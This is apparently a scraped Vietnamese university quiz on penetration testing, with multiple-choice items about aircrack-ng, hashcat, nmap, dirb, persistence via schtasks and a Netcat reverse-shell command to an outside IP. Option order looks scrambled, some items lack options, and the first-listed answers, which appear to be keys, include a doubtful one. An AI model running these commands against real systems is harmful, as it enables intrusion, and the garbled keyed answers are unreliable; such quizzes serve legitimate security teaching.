1. Trong quá trình kiểm thử mạng không dây, Tom thực hiện câu lệnh như hình dưới đây: root@xali:~# aircrack-ng -b 12:34:56:78:90:AB /tmp/wpa_output*.cap Mục đích của Tom trong trường hợp này là gì?

C. Bẻ khoá WEP dựa trên gói tin thu được

A. Xác định các mạng hỗ trợ WPS

B. Xác định thông tin về ESSID của AP mà máy nạn nhân đang kết nối

D. Thu thập mật khẩu truy cập cho bộ định tuyến hỗ trợ WPS sau bẻ khoá WPS PIN

1. Jenny thực hiện kiểm thử cho một tổ chức và đã xâm nhập thành công vào một máy chủ windows. Jenny cố gắng duy trì khả năng kết nối lâu dài tới hệ thống máy tính nạn nhân. Câu lệnh nào dưới đây có khả năng thực hiện việc đó?

C. Schtasks.exe /create/tr powershell.exe Sv.ps1/run

A. Net session server | dsquery -user | net use c$

B. Powershell && set-executionpolicy unrestricted

D. Reg save HKLMSystemCurrentControlSetServiceSv.reg

1. Trong quá trình thực hiện kiểm thử, Alice đã thu được NetNTLMv2 hash sử dụng Responder. Lệnh nào dưới đây cho phép người kiểm thử bẻ khóa giá trị hash thu được sử dụng tấn công mặt nạ?

A. hashcat -m 5600 -r rules/bestG4.rule hash.txt wordlist.txt

C. hashcat -m 5600 -o results.text hash.txt wordlist.txt

D. hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?a?a

1. Tom đang thực hiện kiểm thử cho một công ty và anh ấy lo ngại rằng Web server đang không chạy bản cập nhật phần mềm mới nhất. Câu lệnh nào dưới đây có thể giúp Tom kiểm tra được những lo ngại của anh ấy?

C. nmap -p 80 -sV targetwebsite.com

A. nc -v -p 80 targetwebsite.com

B. hping3 -S -p80 targetwebsite.com

D. nslookup -port-80 targetwebsite.com

1. Trong quá trình kiểm thử mạng không dây, Tom có thu được 1 số lượng lớn các gói tin handshake. Lệnh nào dưới đây cho phép bẻ khoá PSK dựa trên gói tin handshake thu được sử dụng tập từ điểm cho trước?

D. Aircrack-ng -w rockyou.txt -b <target MAC> <outfile>

A. Airodump-ng -c 1 –bssid E4:6F:13:04:CE:31 -w rockyou.txt

B. Airmon-ng -w rockyou.txt -b <target MAC> <outfile>

C. Hashcat -m 2500 WPA.hccapx rockyou.txt

14. Trong quá trình dò quét nmap, Casey sử dụng cờ -O để xác định thông tin về hệ điều hành của hệ thống. Quá trình dò quét xác định được thông tin về hệ thống như sau: Running: Linux 2.6.x OS CPE: cpe: /o: linux:linux_kernel: 2.6 OS details: Linux 2.6.9 – 2.6.33 Casey có thể xác định điều gì từ những thông tin này?

C. Hệ thống đang chạy linux 2.6 kernel trong khoảng giữa .9 và .33

A. Ngày hệ thống được vá lần cuối

B. Thông tin về các bản vá của linux kernel đã được cài đặt

D. Xác định thông tin về bản phân phối linux (linux distribution) được cài đặt trên hệ thống

1. Trong quá trình kiểm thử xâm nhập, Mary thu thập được một số thông tin các thực cấp thấp cho máy chủ linux thông qua tấn công kỹ nghệ xã hội. Sau khi kiểm tra và xác minh các thông tin đăng nhập này, Mary bắt đầu tìm kiếm cách thực hiện tấn công leo thang đặc quyền và cô phát hiện ra thông tin sau: foo@victim:~$ sudo -l User foo may run the following commands on this host: (root) NOPASSWD: ALL foo@victim:~$ Lỗ hổng cấu hình nào được Mary tìm thấy?

D. Quyền truy cập sudo không an toàn

A. Sử dụng SUID/SGID không an toàn

C. Mật khẩu được lưu trữ dưới dạng bản rõ

1. Liam thực hiện kiểm thử cho hệ thống công ty X. Sau khi thực hiện xâm nhập thành công vào hệ thống, cô ấy thực hiện câu lệnh dưới đây trên máy mục tiêu: Liam đang cố gắng thực hiện việc gì? nc 10.1.10.1 6666 -e /bin/sh

D. Thiết lập bind shell sử dụng Netcat

A. Khởi động reverse shell sử dụng Netcat

B. Không có đáp án nào đúng

C. Chặn bắt lưu lượng trên cổng 6666 sử dụng netcat

1. Đối với kiểm thử xâm nhập được tiến hành từ bên trong mạng nội bộ (phía sau các giải pháp bảo vệ vành đai như Firewall, IDS/IPS), việc được cung cấp quyền tiếp cận hạn chế có nghĩa là gì?

D. Người kiểm thử chỉ được cung cấp kết nối ban đầu tới các hệ thống đích

A. Người kiểm thử được cung cấp tài khoản quản trị

B. Người kiểm thử sẽ chỉ được kết nối tới hệ thống đích trong một khoảng thời gian thời hạn

C. Việc truy cập mạng vào các hệ thống hoặc mạng đích sẽ chỉ được phép trong những giờ được xác định trước

1. Tom thực hiện kiểm thử ứng dụng web cho một công ty sử dụng DIRB. Anh ấy muốn dò quét không đệ quy các thư mục trên máy chủ web và tìm kiếm các trang có phần mở rộng là .php. Ngoài ra, mỗi yêu cầu gửi lên phía máy chủ web cần cách nhau một khoảng thời gian xác định để tránh bị phát. Lệnh nào sau đây cho phép anh ấy thực hiện điều này?

C. dirb http://www.webpentest.com -r -X php -z 100

A. dirb http://www.webpentest.com -o php -N 302

B. dirb http://www.webpentest.com -X php -z 100 -v

D. dirb http://www.webpentest.com -z 10 -o php

1. Khi thực hiện kiểm thử xâm nhập, Charles sử dụng nmap để dò quét hệ thống mục tiêu bằng lệnh sau: nmap -sT -sV -T2 -p 1-65535 example.com Sau khi xem quá trình dò quét chạy trong hơn 2 giờ đồng hồ, anh ấy nhận ra rằng mình cần phải tối ưu hoá câu lệnh dò quét. Phương án nào dưới đây KHÔNG phải là cách hữu ích để tăng tốc độ dò quét?

A. Chỉ quét UDP để cải thiện tốc độ

B. Thay đổi mẫu thời gian từ -T2 sang thành -T3 hoặc -T4

C. Sử dụng danh sách cổng mặc định

D. Chuyển sang sử dụng SYN scan

1. Trong quá trình kiểm thử mạng không dây, Tom thực hiện lệnh: root@xali:/tmp# airodump-ng -c 4 --bssid 12:34:56:78:90:AB -w airodump_output wlan0mon Mục đích của Tom trong trường hợp này là gì?

B. Thu thập lưu lượng truy cập từ AP và lưu vào tập tin PCAP

A. Bẻ khoá PSK được sử dụng để kết nỗi với điểm truy cập không dây

C. Lắng nghe các beacon frame để gửi một yêu cầu kết nối tới AP có địa chỉ BSSID 12:34:56:78:AB

D. Tiến hành tấn công brute force PIN WPS để có được quyền truy cập mật khẩu của AP

1. Renee đang tiến hành một cuộc kiểm thử xâm nhập và phát hiện ra bằng chứng cho thấy một trong những hệ thống của công ty khách hàng đã bị tấn công. Renee nên làm gì ngay sau khi xác nhận các nghi ngờ của mình?

B. Báo cáo ngay các thông tin về bằng chứng tấn công cho khách hàng

A. Không cần thực hiện thêm hành động nào vi phạm vì công việc của Renee chỉ giới hạn trong việc thực hiện kiểm thử

C. Ghi lại các chi tiết trong báo cáo kiểm thử xâm nhập

D. Khắc phục lỗ hổng cho phép Renee có quyền truy cập

1. Trong quá trình kiểm thử mạng không dây, Tom thực hiện câu lệnh: root@kalo:~#aireplay-ng -0 0 -a 12:34:56:78:90:AB -c FE:DC:BA:09:87:65 wlan0… Mục đích của Tom trong trường hợp này là gì?

B. Thực hiện tấn công từ chối dịch vụ bằng cách gửi deauthentication frame tới các thiết bị đang kết nối trong mạng không dây

A. Khôi phục mật khẩu WPA từ WPS PIN

C. Thiết lập proxy để thực hiện tấn công SSL strip lên các yêu cầu HTTPS

D. Thu thập thông tin về quá trình bắt tay 4 bước trong mạng không dây

1. Trong quá trình kiểm thử ứng dụng web, Jack phát hiện ra một số lỗ hổng nghiêm trọng. Anh ấy muốn lợi dụng các lỗ hổng này để tạo một tài khoản trái phép. Những tấn công nào dưới đây có thể được liên kết với nhau để dẫn đến việc tạo thành công tài khoản của Jack?

C. Insecure direct object reference, Code injection

A. CSRF, Insecure direct object reference

B. Code injection, Directory traversal

kiemthu1908

University

•

69 Qs

Similar activities

Bài kiểm tra chương 1: Quản trị học

University

•

69 Qs

TƯ TƯỞNG HỒ CHÍ MINH - PHẦN 03

University

•

65 Qs

LSĐC3

University

•

70 Qs

Triết học Mác-Lênin

University

•

72 Qs

Bài 2: Sự phát triển của phôi từ tuần thứ hai đến tuần thứ bốn

University

•

73 Qs

Triết mác (chương 2)

University

•

73 Qs

Co khi dien luc 1- chương 4 Bơm Thể Tích

University

•

67 Qs

Living Online =)))

University

•

64 Qs

kiemthu1908

Quiz

•

Other

•

University

•

Practice Problem

•

Easy

Hiếu Doãn

Used 6+ times

FREE Resource

C. OSINT

D. Port scanning

Create a free account and access millions of resources

Create resources

Host any resource

Get auto-graded reports

Continue with Google

Continue with Email

Continue with Classlink

Continue with Clever

or continue with

Microsoft

Apple

Others

Already have an account?

Similar Resources on Wayground

72 questions

quizizzHDV1

Quiz

•

University

72 questions

Bộ đề thi NQ chiếm 90% các câu hỏi có trong kỳ thi đợt 2

Quiz

•

University

68 questions

Câu hỏi về đại số quan hệ

Quiz

•

University

73 questions

Hội chứng Bệnh p2

Quiz

•

University

70 questions

chap12 giác quan

Quiz

•

University

64 questions

Tâm lý học bài 4

Quiz

•

University

73 questions

kape-7.4-9.2

Quiz

•

University

65 questions

Khởi Sự Doanh Nghiệp

Quiz

•

University

Popular Resources on Wayground

5 questions

This is not a...winter edition (Drawing game)

Quiz

•

1st - 5th Grade

15 questions

4:3 Model Multiplication of Decimals by Whole Numbers

Quiz

•

5th Grade

25 questions

Multiplication Facts

Quiz

•

5th Grade

10 questions

The Best Christmas Pageant Ever Chapters 1 & 2

Quiz

•

4th Grade

12 questions

Unit 4 Review Day

Quiz

•

3rd Grade

10 questions

Identify Iconic Christmas Movie Scenes

Interactive video

•

6th - 10th Grade

20 questions

Christmas Trivia

Quiz

•

6th - 8th Grade

18 questions

Kids Christmas Trivia

Quiz

•

KG - 5th Grade

Discover more resources for Other

26 questions

Christmas Movie Trivia

Lesson

•

8th Grade - Professio...

7 questions

Different Types of Energy

Interactive video

•

4th Grade - University

20 questions

Slopes and Slope-Intercept Form

Quiz

•

8th Grade - University

7 questions

Force and Motion

Interactive video

•

4th Grade - University

7 questions

Biomolecules (Updated)

Interactive video

•

11th Grade - University

20 questions

Winter/Holiday Trivia

Quiz

•

KG - University

10 questions

WINTER WIN Time - ELA - 12/9/2025

Quiz

•

KG - University

7 questions

Human Impact on Resources

Interactive video

•

4th Grade - University